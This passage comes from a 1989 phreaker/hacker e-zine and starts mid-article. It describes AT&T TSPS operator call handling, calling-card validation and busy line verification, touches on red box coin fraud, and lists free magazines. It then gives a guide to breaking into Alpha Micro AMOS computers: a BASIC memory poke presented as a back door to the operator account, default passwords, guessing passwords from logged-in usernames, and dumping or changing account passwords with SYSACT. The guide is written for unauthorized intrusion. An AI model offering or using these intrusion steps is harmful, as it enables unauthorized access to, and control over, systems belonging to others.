Trunk is connect to the MF receiver, which then proceeds to outpulse

the MF digits. The digits are received and registered on ferrods by

the PTA in the order in which they were received. The called number

is the number dialed by the customer and consists of either 7 or 10

digits; the calling number is determined by the local office ANI

equipment or by ONI, in case of ANIF.



5.3) Bridging a Position

=========================

- An idle occupied position is then bridged onto the call by a

connection to the TSPS. If operator service is required after

connection to a position, the operator is prompted by a "zip" tone,

and is alerted by a KIND OF CALL lamp, which provides information

as to whether the call is coin, noncoin, 0+, 0-...If no operator

service is required, the MF digits are outpulsed along the

appropriate routing.



5.4) Call Connection

=====================

- If operator action was needed, upon the operators disconnect of the

line (position released), the network connection between the the

TSPS trunk and the base remote trunk is severed. The established

through connection is now placed in a call floating (talking) state

until disconnect.



5.5) Call Disconnection

========================

- Both ends of a connected call are monitored for an off-hook state

change, which upon indication,must occur long enough to be recognized

as an actual disconnect (and not merely a flash...). Another manner

of disconnect is from a called party Time Released Disconnect (TRD),

which is employed to limit billed party liability and release network

connections. Example: A customer requests a disconnect after x number

of minutes, or after $x.xx. The final action in a disconnect is to

return the TSPS trunk to an idle position, which then awaits

recognition of another service request.



5.6) AMA Data Accumulation and Reception

=========================================

- After a disconnect has been established, the AMA information is

registered, and prepared for billing. The following is just some

of the information that is recorded on disk for processing.



- Call Connect

- Elapsed time

- Signaling Irregularities

- WalkAway Toggle (coin station fraud...discussed later)

- Type of number billed









6.0 Coin Station Calls and ACTS Processing

==========================================



In general, coin station calls can be divided into 1+, 0+ and 0- originated

calls, not including 0+ and 0- CCS calls which will be discussed later in this

file. All calls falling into these categories go through the following basic

operations, many of which were described in section 5 of this file. (The []

indicate operations that may or may not be present, depending on the type of

call placed)



- 1) Trunk Seizure

- 2) Digit Reception

- 3) Bridging a Position [and Coin Detection and Announcement (CDA)]

- 4) [Operation Action and] Digit Outpulsing.

- 5) Talking Connection

- 6) Call Disconnect

- 7) AMA Processing







6.1 Automated Call Processing

==============================



All coin station calls requiring coin input from the customer are handled by

the Automated Toll Services (ACTS) which is implemented by the Station

Signaling and Announcement Subsystem (SSAS). The SSAS automates the initial

contact on most 1+ (station paid) toll calls, by transmitting an announcement

requesting the initial deposit from the customer, and counting the deposits.

If an unusual delay occurs during the coin deposit period, the SSAS will prompt

the user for the remaining deposit needed to complete the call. Upon

completion of sufficient deposit, SSAS provides an acknowledgement announcement

thanking the customer, and then causes the outpulsing of the called digits to

be handled by the Stored Program Control (SPC). This delay in outpulsing

prevents free, short duration messages and keeps the audible ring of the called

party from interfering with coin detection signals. Any customer over-deposit

is automatically credited towards overtime charges. SSAS can accommodate

initial periods of up to 6 minutes, at the end of which the local office rate

schedule is accessed and announcement may or may not notify the customer of

the end of initial period.



6.2 Operator Intervention

===========================



If at any time during the coin collection period, a customer fails to deposit

the sufficient funds (within a specified time period), or a flash is registered

on the switchhook, a TSPS operator will be bridged onto the call. In this

event SSAS will monitor the coin deposits via a type I CDA circuit; however all

automated coin announcements will be suppressed. All calls originating from

postpay coin stations must initially be handled by an operator, in that postpay

coin stations lack coin return equipment, and cannot return deposited coins

(i.e.- Postpay stations do not have a coin hopper, only a coin box). This

physical restriction requires the operator to verify that the correct party has

been reached (and goes off-hook), before the customer makes any deposit. Upon

verification, a type II CDA circuit is connected to count and monitor the coin

deposits. This type of circuit is also connected whenever there is a large

amount of change associated with the call. This is because the coin hoppers on

standard payphones, can only handle limited deposits. If a deposit exceeds the

hopper limit, an operator will be bridged to the circuit to make a series of

partial collections.





6.3 SSAS Fully Automatic Criteria

==================================



The SSAS fully automates 1+ coin station calls (ACTS) if and only if all of the

following conditions are met. Failure to meet any of these conditions results

in operator intervention.



6.3.1) ACTS Converted Trunk Group

==================================

- Coin Stations must be converted to provide DTMF coin deposit signals

that the CDA can recognize.



6.3.2) Machine Ratable

=======================

- The TSPS must receive sufficient rating information; failure to do so

will result in operator intervention.



6.3.3) Successful ANI

======================

- If ANIF or the call is ONI, an operator must be added to the circuit

to record the calling number.



6.3.4 Cannot Be a Postpay Station

==================================

- See previous explanation of postpay stations (6.2).



6.3.5 Cannot Have Large Charges

================================

- See previous explanation (6.2).





6.4 Fraud Detection and Prevention

==================================



If a calling customer goes on-hook (hangs up), at the end of a conversation and

charges are still due, TSPS automatically sends a ringback signal to that

station in the attempt to get the customer to pick up the phone. If the

calling party answers, an ACTS overtime charge message is made requesting the

customer to deposit the remaining amount due. At any time during this message,

an operator may be connected to the circuit and harass the customer for payment

If however 5 rings with a 4 second interval occur without an off-hook state

change, TSPS assumes a walkaway, and a registered traffic counter is flagged,

a walkaway bit set, and the amount due is all registered as AMA data.



Whenever the called party is off-hook, ACTS is susceptible to generated coin

signals (Red Box Tones). In an attempt to prevent this fraud, a special type

II CDA is employed: Two-wire trunks are isolated between forward and back party

to monitor coin deposits. The talking path maintains conversation by being

routed through the type II CDA. When coin signals are detected, the SSAS

informs TSPS that a called party fraud is suspected. If more then one

detection occurs on one call, TSPS flags a fraud indicator on the calls AMA

record. NOTE:A trunk group may or may not detect and/or record this information

depending on office criteria.









7.0 Calling Card Service and Billed Number Service

===================================================



I am assuming that everyone reading this file has at least some concept of what

a calling card is and how it would be utilized from a local office. The CCS and

BNS services are implemented in TSPS by CCIS hardware, SSAS and several

processing programs that will not be discussed in this file (ABEGN, ACALL,

ASEQ...) The CCS and BNS together provide for the customer an automated credit

card calling option that was initially implemented as an alternative to third

party billing, collect and large change calls.



In order for the CCS and BNS to function, they require that each TSPS becomes

a node on the SPC network, which then allows access to a nationwide database of

Billing Validation Applications (BVA). The BVA currently consists of nodes

which are connected by CCIS, and are in turn made up of individual Billing

Validation Files (BVF). A BVF is a file of data that is needed by the SPC and

associated database software to process queries about the data. Each TSPS is

integrated into the SPC network and uses the CCIS direct signaling to access

the BVA. Connected in parallel to the BVA is the Network Call Denial (NCD),

which allows the call denial to AT&T customers with outstanding bills.



The CCS billing number consists of a 10 digit billing number and a 4 digit

PIN. There are two categories that a CCS billing number can fall into and

they are as follows:



- 7.0.1) Directory Billing Number

=================================

- The billing number is usually the directory number to which the

card is billed, and is in the following format: NPA-NXX-XXXX :

Where the NPA represents Numbering Plan Area, N is a digit 2-9, and

X is a digit 0-9.



- 7.0.2) Special Billing Number

===============================

- Wheras the typical CCS billing number is discribed above in 7.0.1,

here exists a special type of billing number that bills the card to

a special nondirectory billing number. The format for this type of

card is as follows: RAO-(0/1)-XX-XXXX : Where the RAO is the

Revenue Accounting Office code which assigns the billing number.

The X represents a digit 0-9.



The PIN is a 4 digit number in the format of NYYY, where N is a digit 2-9, and

Y a digit 0-9. Each PIN is designated upon assignment to the customer as

either restricted or unrestricted. An unrestricted PIN can place calls to all

destinations. If the called number is the same as the billing number, only the

4 digit PIN need be entered by the customer. A restricted PIN can only be used

for station calls to the billing number. NOTE: A special billing number

(section 7.0.2) can only have an unrestricted PIN.





The CCS can be broken down into two basic category of calling types and are as

follows:



7.1 Customer Dialed CCS Call

=============================



The customer initiates the CCS sequence by dialing a 0 + Called Number. The

Called number can take the format of a 7 digit number, a 14 digit number or

01+ country code and national number. This information, as well the calling

number (originating) is received by TSPS from the CO. OST is then used to

determine whether CCS is available/given to the customer. Based on the

determined OST features (Does phone have Touch Tone? Is it a coin station?..),

TSPS either routes the call to an operator or provides an alerting tone and

announcement to prompt the customer for the CCS number (in the format discussed

in sec 7.0). Assuming no operator intervention, the CCS number is subjected to

a series of checks and queries detailed below. (sec 7.3)



7.2 Operator Dialed CCS Call

============================



There are several ways a customer can receive operator assistance in CCS

dialing.



- 7.2.1) 0- call.

- 7.2.2) 0+ Called Number +0

- 7.2.3) 0+ Called Number +Switch-hook flash.

- 7.2.4) 0+ Called Number +No Action.

- 7.2.5) 0+ Called Number +OST feature information requiring operator

intervention. Example: Call placed from rotary phone...

- 7.2.6) 0+ octothorpe. A customer dials an octothorpe

( pound key "#") after the initial 0.



When the position is seized if the operator determines that a CCS call is

requested, the operator keys in the CCS number (or the PIN only) and call is

subjected to a series for checks for validity, detailed below (sec 7.3)



7.2.1 Non-TSPS Dailed CCS Call

===============================



The TSPS operators do not serve all CCS users. Non-TSPS operators and

independent telephone companies also serve CCS customers, and must access the

BVA for validity checks.(Examples: mobile,marine,international...) This access

to the BVA is provided for cordboards and independent telephone companies by

reaching a nearby TSPS, via TSPS base unit inward trunks. A distant operator

may reach the BVA by any of the routing codes detailed in section 4.2.6, and

the CCS validation is subject to the same security checks detailed below. If

a non-TSPS operator dials either KP+(1161 or 1162)+ST, the operator hears a CCS

alert tone, and then has one minute in which to dial the 14 digit CCS number.

The TSPS initiates a format check, an APF check (see 7.3), and access the BVA

to determine the status of the CCS number in question. The following are the

different corresponding announcements which would follow:



- Calling Card Service Number Accepted, PIN unrestricted

- Calling Card Service Number Accepted, PIN restricted

- Calling Card Service Number Accepted, RAO unknown

- Calling Card Service Number Rejected



If a CCS number is accepted, the connection to the non-TSPS operator is

terminated by the TSPS. If a rejection message results, the operator will be

prompted by the alert tone and may attempt to redial the CCS.





7.3 CCS Validation

===================



After the CCS billing number is keyed in (either by customer, TSPS operator,

or independent operator) the All PINs Fail (APF) feature may cause the card to

be rejected and the call to be halted. The APF is a security feature designed

to frustrate attempts at discovering valid PINs by a brute force hack method

(trial and error). A list of CCS validation failures is maintained, which is

updated with both invalid billing numbers and calling numbers. When a number

of failures for a given billing number exceeds a specified threshold, in x

amount of time, all subsequent attempts are declared invalid for a certain

amount of time y (Lock Out Time). Even if the actual PIN is used during the

lockout time, the CCS number would be considered invalid, and the call process

would be halted.





7.4 Billed Number Screening

============================



The BNS service applies to collect and third party billing calls placed

through a TSPS operator. The BVF contains information designating certain

numbers as "collect denied" or "bill-to-third denied". Each time an operator

attempts to place a collect or third party billing number a BVA and a NCD

inquiry are made.









8.0 Busy Line Verification

===========================



A dedicated network is provided to process BLV calls and traffic. This network

originates at the TSPS base office and connects through dedicated trunks to

toll, intertoll, and local offices. The equipment consists of the BLV trunk, a

TSPS-4 wire bridging repeater, a verification circuit at TSPS, InComing

Verification Trunks (ICVT), OutGoing Verification Trunks (OGVT) at both toll

and intertoll offices, and Incoming No Test Trunks (INTT) at local offices.

The TSPS gains access to a single local, toll, and/or intertoll office.



The initial request for a BLV appears as an position seizure to a TSPS operator

over an incoming trunk via a local office or as an inward trunk via a toll

office. The initial loop seized becomes the originating loop and is connect in

position via an idle TSPS loop. In that the originating loop cannot be

connected to the verification loop, the operator must switch between the two.



Security is maintained to insure that a customers privacy is not violated, and

consists of the following:



- 8.0.1) Speech Scrambler at Console Level (not BLV trunk level).

- 8.0.2) Alert Tone Generator (ATG).

- 8.0.3) Translation of the NPA to 0XX or 1XX.

- 8.0.4) Dedicated BLV trunks.

- 8.0.5) Cross office security checks at toll offices.



8.1 BLV Processing

===================



When a customer requests that a BLV be preformed on a certain number within

the TSPS's LAN the following actions are taken.



- 8.1.1) The TSPS attempts to DDD the number in question , to confirm

that the number is indeed busy. This action is preformed so that if

in the event that an recorded error announcement is reached, the

operator may understand the nature of the error without the speech

scrambler interfering in quality.



- 8.1.2) If the line is confirmed to be busy and the customer requests

further action, the operator then attempts verification through the

BLV network. The operator then presses the VFY key, in which case an

attempt at a BLV will be made if and only if the following conditions

are met:



- 8.1.2.1) There is an idle loop at the position

===============================================

- This condition must be met because the BLV trunk must be

placed in a loop with the Traffic Service Position. If

there are no idle loops remaining the BLV cannot be

processed. This condition can be gotten around by the

operator pressing the POS TRSFR key, which causes all the

calls in the hold state to be transferred to loops on the

original operator position.



- 8.1.2.2) The call is on an incoming/inward trunk

================================================

- This insures that an operator cannot preform a BLV

without a originating customer request.



- 8.1.2.3) The called party is off-hook

======================================

- See 8.1.2.2



- 8.1.2.4) The called number is a domestic number

================================================

- That is the called number cannot be an overseas number.



- 8.1.2.5) The call has no forward connection

============================================

- This ensures that the busy condition detected by the INTT

is not due to the connection of the calling party.



- 8.1.2.6) The line number can be verified

=========================================

- This condition would fail if the local office is

not served by the BLV network...



- ..or the number in question is excluded from BLV calls

(Example: Emergency or Police Lines...)



8.1.3) The BLV is preformed and the BLV trunk dropped by pressing

the REC MSG key for an incoming call or VFY for an inward call.







9.0 Conclusion : Acknowledgements and References

=================================================



I have assumed that the reader of this file has a general working knowledge

of phone systems and their associated terminology. As it is impossible to

please everyone, some readers will find this file too advanced while others

will find it lacking in several areas...too bad. This file has intentionally

*not* covered previously released information on TSPS found in files by other

authors, in an attempt to provide the phreak/hack community with another source

of information to be used in conjunction with the existing ones. The following

reading list is highly recommend for furthering ones knowledge on TSPS, and is

as follows:



- Understanding TSPS Part 1: The Console - Written by The Marauder, LOD/H

Technical Journal: Issue No. 1, file #4.



- Busy Line Verification Part 1 - Written by Phantom Phreaker, Phrack Vol 2,

Issue XI, file #10.



- Busy Line Verification Part 2 - Written by Phantom Phreaker, Phrack Vol 2,

Issue XII, file #8



- Telephony Magazine



9.1 Acknowledgements

=====================



- Eastwind...the Man Behind the Garbage Can...

- AT&T

- My Local RBOC...and all of the Trash that's fit to print





=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



P/HUN Issue #4, Volume 2: Phile 7 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5/19/89 * Free Computer Magazines * 5/19/89



by



+ Southern Cross +



_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _



TPT Networking Management

1421 S. Sheridan

P.O. Box 21728

Tulsa, OK 74101-9977



Computer Design Recommended

P.O. Box 2389

Tulsa, OK 74101-9933



Scientific Computing & Automation Recommended

301 Gibraltar Drive

P.O. Box 608

Morris Plains, NJ 07950-0608



Industrial Product Bulletin

301 Gibraltar Drive

P.O.Box 650

Morris Plains, NJ 07950-0650



Computer Products

301 Gibraltar Drive

P.O. Box 601

Morris Plains, NJ 07950-9813



Connect Journal of Computer Networking

3165 Kifer Rd.

P.O.Box 58145

Santa Clara, CA 95052



Microcomputer Solutions Magazine

Intel Corporation

GRI-58

P.O. Box 58065

Santa Clara, CA 95052-8065



Evaluation Engineering

2504 North Tamiami Trail

Nokomis, FL 34275-9987



Electronics Recommended

P.O. Box No. 2713

Clinton, Iowa 52735



Systems Integration

P.O. Box 5051

Denver, CO 80217



EDN Recommended

P.O. Box 5262

Denver, CO 80217-9865



Computer Technology Review Recommended

West World Productions, Inc.

924 Westwood Blvd., Suite 650

Los Angeles, CA 90024-2910



Microwave Journal Recommended

685 Canton Street

Norwood, MA 02062



NASA Tech Briefs Recommended

Associated Business Publications

41 E. 42nd St., Suite 921

New York, NY 10164-0672



Computer & Software News

A Lebhar-Friedman Publication

Grand Central Station

P.O. Box 3119

New York, NY 10164-0659



Compliance Engineering Recommended

629 Massachusetts Avenue

Boxborough, MA 01719-9974



Government Computer News

P.O. Box 3705

McLean, VA 22103



Federal Computer Week

3110 Fairview Park Drive

Falls Church, VA 22042-4599



Defense Electronics Recommended

EW Communications, Inc.

P.O. Box 50249

Palo Alto, CA 94303-9983



Defense Computing Recommended

P.O. Box 5286

Pittsfield, MA 01203-5286



Laurin Publishing Co., Inc.

Photonics Spectra

P.O. Box 2037

Pittsfield, MA 01202-9925



Computer Graphics Review

P.O. Box 12950

Overland Park, KS 66212-0950



Electronic Design Recommended

VNU Business Publications

P.O. Box 5194

Pittsfield, MA 01203-5194



Electronic Products Recommended

P.O. Box 5317

Pittsfield, MA 01203-9899



Software Magazine Not Recommended

P.O. Box 542

Winchester, MA 01890



Specialized Products Company Recommended

2117 W. Walnut Hill Lane

Irving, TX 75038-9955



The LAN Catalog & Black Box Catalog

Black Box Corporation

P.O. Box 12800

Pittsburgh, PA 15241-9912



Computer-Aided Engineering

A Penton Publication

1100 Superior Avenue

Cleveland, OH 44197-8006



PERX (catalog)

1730 S. Amphlett Blvd., Dept. 222

San Mateo, CA 94402



Anasco (catalog)

Commerce Center Building

42A Cherry Hill Drive

Danvers, MA 01923-9916



MetraByte Corporation (catalog) Recommended

440 Myles Standish Blvd.

Taunton, MA 02780



Micro Networks (A/D catalog) Recommended

324 Clark Street

Worcester, MA 01606



Programmer's Connection

7249 Whipple Ave. NW

North Canton, OH 44720



Burr-Brown Corporation (catalog)

P.O. Box 11400

Tuscon, AZ 85734



WAVETEK San Diego (catalog) Recommended

P.O. Box 85434

San Diego, CA 92138



Digi-Key Corporation (catalog) Recommended

701 Brooks Avenue South

P.O. Box 677

Thief River Falls, MN 56701-0677



Consumertronics Co. (catalog) Recommended

2011 Crescent Drive, P.O. Drawer 537

Alamogordo, NM 88310



Time Motion Tools (catalog)

410 South Douglas Street

El Segundo, CA 90245



EXAR Corporation (modem design catalog)

750 Palomar Ave.

P.O. Box 3575

Sunnyvale, CA 94088

ATTN: Marketing Communications

Chilton's Instrumentation & Control News

Box 2006

Radnor, PA 19089-9975



Communications Week

P.O. Box 2070

Manhasset, NY 11030



Computer Systems News

CMP Publications, Inc.

600 Community Drive

Manhasset, NY 11030



Electronic Engineering Times

Circulation Dep't.

Box 2010

Manhasset, NY 11030



Network World

P.O. Box 1021

Southeastern, PA 19398-9979



Digital Review

P.O. Box 40065

Philadelphia, PA 19106-9931



Digital News

P.O. Box 593

Winchester, MA 01890-9953



DEC Professional

P.O. Box 503

Spring House, PA 19477-0503



Macintosh News

Circulations Dep't.

P.O. Box 2180

Manhasset, NY 11030



UNIX Today!

CMP Publications, Inc.

600 Community Drive

Manhasset, NY 11030



LAN Times

122 East 1700 South

P.O. Box 5900

Provo, UT 84601



Electronic Business

275 Washington Street

Newton, MA 02158-1630



PCNetwork

P.O. Box 457

Newton, NJ 07860



INFO World

P.O. Box 5994

Pasadena, CA 91107



Reseller Management Not Recommended

301 Gibraltar Drive

P.O. Box 601

Morris Plains, NJ 07950-9811



Computer Reseller News Not Recommended

CMP Publications, Inc.

600 Community Drive

Manhasset, NY 11030



This is a partial list of free computer magazines and newspapers of interest

to the hacker/phreaker community. Just ask for a free subscription form,

fill it out, and you'll have enough to read for a long time! (You also get to

stay on top of the "state" of the art) The recommended mags have articles,

products, schematics, and diagrams of particular interest and application

for most of the community. (You'll find that they're an education unto themselves.) Enjoy!



+SC+

Cruise Director

S.S. Phuntastic

(...lost in a sea of paper...)



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+ P/HUN Issue #4, Volume 2: Phile 8 of 11 +

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +

+ A Guide to Hacking AMOS +

+ ----------------------- +

+ By NightCrawler +

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



The Alpha Micro computer is a fairly easy system to understand, for

those of you familiar with VAX systems. The operating system (AMOS)

is a ripoff of the DEC stuff, so many commands are similar. This is

a guide on how to use the Alpha.



Background on security:

---------- -- ---------



When the Alpha Micro leaves the factory, they do not have any type of

security feature built into it, except for certain higher end models,

which will be discussed later. Thus, if the user installs a modem

directly to the system, and you call in, you'll be at the OS level

already. Pretty easy, eh?



Due to the lack of a cursor display character, the pound sign (#) will

be used to represent the cursor throughout this document. The prompt

for AMOS is a period, which users refer to as the dot. Wnen you log on,

you'll see this:



.#



At this point, you can type away and use the various accounts and

programs on the system. When you first connect, depending on how the

last user left the modem, you may or may not be logged in to a

partition. To verify this, type in the LOG command.



.LOG



The computer will respond in one of two fashions. If it says "Not

logged in", then you will have to log to an existing account. If it

says "Current login is DSK1:[203,1]", then there is no need to scan

for an account right away.



Perhaps the most important thing to do after this is to do a SYSTAT,

which will let you know who else is on the system, and what account,

program is being run, and other info. Example:



.SYSTAT



Status of AMOS/L version 1.3D(165) on Friday, November 11, 1988 03:24:54 PM



JOB1 TRM1 DSK1:201,3 0067732 ^C CONECT 122880 bytes at 4505554

JOB2 TRM2 DSK0:1,2 0024984 TI SYSACT 176800 bytes at 4505554

JOB3 TRM3 Not logged 0015460 ^C MEMORY 12288 bytes at 3137554

MODEM HAYES DSK0:1,4 0037325 SL SYSTAT 67912 bytes at 2179023



4 jobs allocated on system, 3 jobs in use (3 logged in)

Total memory on system is 2048K bytes

System uptime is 07:28:19



DSK0 26402 blocks free DSK1 3578 blocks free

4 devices on system, total of 29980 blocks free



.#



Here's a quick rundown on what each column means...

Col 1: The name of the job

Col 2: The terminal to which the job is attached

Col 3: The device and account into which the job is logged

Col 4: The octal memory address where the JCB is located

Col 5: Terminal status of for that job

Col 6: Last program run by that job

Col 7: Number of bytes (decimal) of memory allocated

Col 8: Octal memory address for beginning memory partition



The rest is self explanatory. The 5th column (terminal status) has

numerous codes which need to be given. Here's the abbreviation and what

it stands for:



TI Terminal input wait state

TO Terminal output wait state

LD Program load state

SL Sleep state

IO I/O access other than terminal

EW External wait state

RN Running

SP Suspended state

SW Semaphore wait

^C Control-C



The SYSTAT program can be used even when you are not logged in, which

is a plus if you wish to access an account without knowing the password.

There is another program, called STAT, but don't use this. It

constantly updates the screen, and will mess you up if you're using a

modem.



Before going further, it should be mentioned on how the Alpha Micro

computer is structured. On each system, a number of hard drives

subdivided into logical units are encountered. These may be named in

any fashion by the sysop, following only the limitation of the LU being

three letters or less in length. This is then followed by the device

number. Sample LU's may look like: DSK0:, DSK1:, WIN0:, HWK3:, etc.



On each disk is found a grouping of accounts, also known as partitions,

or PPN's (project, programmer number). It is in these accounts where

you log in to, and execute programs. These are enclosed in square

brackets [], to separate them from the disk specification. When used

all togther, it looks like this:



DSK0:[1,2], DSK0:[1,4], WIN3:[100,0], DSK4:[377,7]





System Commands:

------ ---------



When in doubt, type HELP. This will give you some online information

the system you are currently logged in to. Below are a list of some

of the more common commands that you can use.



ASCDMP -- displays the data in physical bocks in ASCII form.

ATTACH -- connects a job to a terminal.

BASIC -- places you in interactive BASIC mode.

BATCH -- loads frequently used commands to y

  
our memory partition.

BAUD -- change the baud rate of your terminal.

CAL100 -- allows you to calibrate the clock oscillator.

CLEAR -- write zeroes to all free disk blocks.

COMPIL -- use this to compile BASIC programs.

COPY -- copies one or more files between accounts or disks.

CREATE -- creates a random file of specified size (any size!!).

CRT610 -- verifies quality of videocasstte backup media.

DATE -- returns with current system date.

DING -- rings the terminal bell.

DIR -- gives a directory listing for specific files or accounts.

DIRSEQ -- alphabetizes all current entries in an account.

DSKANA -- analyzes the data on a disk, and reports errors.

DSKCPY -- copies contents of one disk and places on another disk.

DSKDDT -- allows you to examine and change data directly on disk.

DSKPAK -- packs the blocks in use to create area of free blocks.

DUMP -- display file contents & memory to the screen.

ERASE -- deletes one or more files from disk.

ERSATZ -- displays the currently defined ersatz names.

FIX -- disassemble assembler (.LIT) code.

FORCE -- allows you to send terminal input to another job.

HELP -- displays all available help files for the system.

JOBALC -- displays your job name.

JOBPRI -- determine your job priority, and change other's priority.

JOBS -- shows all jobs on system, and how many are in use.

KILL -- kill the program being run by another job, or a single job.

LNKLIT -- creates ML programs by linking object code files.

LOAD -- loads disk files into your memory partition as mem modules.

LOG -- logs you into an account so you can access the files there.

LOGOFF -- logs you out of the account you were logged into.

MAKE -- creates the first record of a SEQ file (make a bogus file).

MEMORY -- allocates memory to your job (e.g. .MEMORY 64K).

MONTST -- tests the system monitor by bringing up the system new.

MOUNT -- see which disks are on the system. Do a /U to unmount a disk.

M68 -- assemble an assembler program to an unlinnked ML file.

PASS -- allows you to change your account password.

PPN -- displays a list of all accounts on a logical device (eg DSK0:).

PRINT -- send one or more files to a printer.

QDT -- allows you to examine and modify locations in memory.

REBOOT -- reboots the system after hitting RETURN.

REDALL -- diagnostic test that looks at disk & reports read errors.

RENAME -- rename files in an account from one name to another.

RUN -- runs a compiled BASIC program.

SAVE -- save memory modules as disk files.

SEND -- send messages to other terminals on the system.

SET -- set terminal handling options for your terminal.

SLEEP -- put your job to "sleep" for a period of time.

SORT -- alphabetically & numerically sort data in a SEQ file.

STAT -- displays & continually updates status of all system jobs.

SUBMIT -- used to enter, change, or delete files from task manager.

SYSACT -- used to change account passwords, or initialize a disk.

SYSTAT -- mentioned above.

TIME -- displays or sets the time of day.

TRMDEF -- gives information about the system terminals.

TYPE -- displays a text file to the screen (use the /P switch).

VCRRES -- read files from videocassette to disk.

VCRSAV -- save files from disk to videocassette.

VER -- gives you version of current operating system level.

VUE -- create and enter text editor. Use ESCape to toggle modes.



You have to be careful with how the programs are used. If done

inappropriately, you could do major damage to the computer. Many of

the above programs can only be executed from the operator account

DSK0:[1,2].





+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Entering via BASIC:



There is a back door in the version of BASIC that comes bundled with

AMOS. Depending on the type of security present, you can gain access

to the system operator account (DSK0:[1,2]), which gives you the power

to do quite a few things. What the command essentially does is poke

into memory the appropriate values to give you sysop access.



Type this in at the dot prompt (.) :



.BASIC



AlphaBASIC Version 1.3 (217)



READY



#



Once inside BASIC, type in this command as seen below; it doesn't

matter if you use upper or lower case.



WORD(WORD(1072)+20)=258



BYE



.#



The BYE command exits you out of BASIC and puts you back at the

OS level. You can also rename files and open files via BASIC.



Depending on the security in the system, if you typed in everything

as above, you should be logged into DSK0:[1,2], also known as OPR:.

This is the system operator's account, from which all types of

commands can be issued.



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



When you finally get connected to the system, you need some place to log

in to. There are certain default accounts on every system. These are:



OPR: --> DSK0:[1,2] SYS: --> DSK0:[1,4]

DVR: --> DSK0:[1,6] CMD: --> DSK0:[2,2]

LIB: --> DSK0:[7,0] HLP: --> DSK0:[7,1]

BOX: --> DSK0:[7,2] BAS: --> DSK0:[7,6]

MAC: --> DSK0:[7,7]



While logging around to the different accounts, some will have defined

"ersatz" names. This means that besides the [p,pn] specification, you can

access that account with a defined name. In the above examples, logging

into SYS: is the same as logging into DSK0:[1,4].





As mentioned previously, older models of the Alpha Micro did not have any

security built in to them. Later versions of the operating have changed

this, though. Once you get connected and you try to log into an account,

you may be asked for a password. The word you type is not echoed on your

screen. Two default passwords that you can try for logging purposes are

"DEMO" and "SYSTEM SERVICE". These are not case-sensitive, so you can

type them in either upper or lower case. If neither of these work (which

is unlikely, since people are too lazy to change them), try running the

SYSTAT command.



What happens is that you will often see people logged in under a short

(6 digits or less) user name, such as JOHN, AMY, SUSAN, etc. Try logging

in with one of these as your PW. 80 per cent of the time it will work.



If you've gotten into the system this far, then good. There are lots

of things to do or access. If you're looking around for information,

these are contained in files that end in a .TXT extension. These may be

examined by using the TYPE command from AMOS. The syntax would be:



.TYPE MODEM.TXT/P



The /P is not required, but is useful, because otherwise the file would be

diaplayed too quickly for you to look at. The /P switch displays the

contents one page at a time. Pressing <RET> will scroll through the text.

One word of warning: Don't use the TYPE command on .LIT, .SBR, or .OBJ

files; doing so will usually result in your terminal being locked up,

effectively ending your session.



Now let's say you wanted to check out the files that are in other accounts.

Usually all that is needed is to simply log there. However, certain

accounts will be passworded. There is no simple way to just dump the

contents of a disk block and see what the PW is. There are alternatives,

however. One method is to log into the operator account (DSK0:[1,2]) and

use the SYSACT command. This lets you to various things to the disk, but

the one you would be concerned about lists all of the accounts on a parti-

cular disk. The command works like this:



.#

.SYSACT DSK0:



Use the "H" to get a listing of all the available commands from within

SYSACT.



*

*h

Implemented commands are:

A PPN - Add a new account

C PPN - Change password of an account

D PPN - Delete an account

E - Rewrite MFD and exit to monitor

H - Help (Print instructions)

I - Initialize entire disk

L - List current accounts



The last one "L" is the one we're concerned with. Press <RET> after it to

see a listing of all the accounts on the disk. Passwords (if any) will be

displayed to the right. The "C" option will allow you to change the PW on

an individual account. Then press "E" to go back to the command level.



If you want to check out a file a little less elegantly, this may be done

by simply copying the file to an unpassworded account or by typing the

file from another account.



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Account and file structure:



As explained before, there are accounts on the disk, which may or may not

contain files in them. AMOS maintains this account structure on the disk.

In fact, a listing of which files belong in what account are kept track of

in the account directory.



There are two types of files that are possible on the Alpha Micro:

sequential (linked) and random (contiguous) files. Each block is 512 bytes

in length, which may or may not be filled up totally. Files may not overlap

onto another disk, and each disk block has a unique number by which it is

referenced to via AMOS.



The format of most Alpha files are sequential -- AMOS reads in each disk

block of the file, which tells it the disk address of the next disk block.

The key point is that to access one block of data, you have to access all

preceding blocks.



When AMOS writes a sequential file to the disk, it looks for the first free

disk block. It writes a copy of the first file block into that disk

location. Next, it looks for another free disk block. This next disk block

may or may not be anywhere near the first block used. This process goes on

until the entire file is transferred to the disk. The disk blocks that make

up the file may be scattered across the disk. Each disk block in the file

contains a portion of the file; it also contains the address of the next

disk block used by the file.



*-----------*-----------*

| Address of| Data in |

| next block| file block|

*-----------*-----------*



Sequential files are also called linked files because the disk blocks are

linked together by the information in each block that points to the address

of the next disk block. The last block in the file is designated as such

by a link of zero. It looks like this:



/---\

/----------------\ /----------------\ ! |

! ! ! ! ! X

*-----------*--------* ! *-----------*--------* ! *----------*-------*

| Address of| DATA | ->| Address of| DATA | !->| EOF | DATA |

| next block| | | next block| | | Zero link| |

*-----------*--------* *-----------*--------* *----------*-------*





Random files differ from their sequential counterparts because the data in

them can be accessed randomly. AMOS knows how long the files are, and also

knows exactly where the files begin on the disk. The operating system can

therefore access any block in a file by computing an offset value from the

front of the file, and then reading the proper disk location. The distinc-

tion between random and sequential is that since the disk blocks don't have

to be accessed in any particular order, AMOS can locate specific data in a

file quicker.



When a random file is written to disk, the first free groups of contiguous

blocks are searched for which are large enough to hold the entire file. If

there aren't enough blocks on the disk, the message "Disk full" appears.

Random files look something like this:





*---------------*---------------*---------------*---------------*

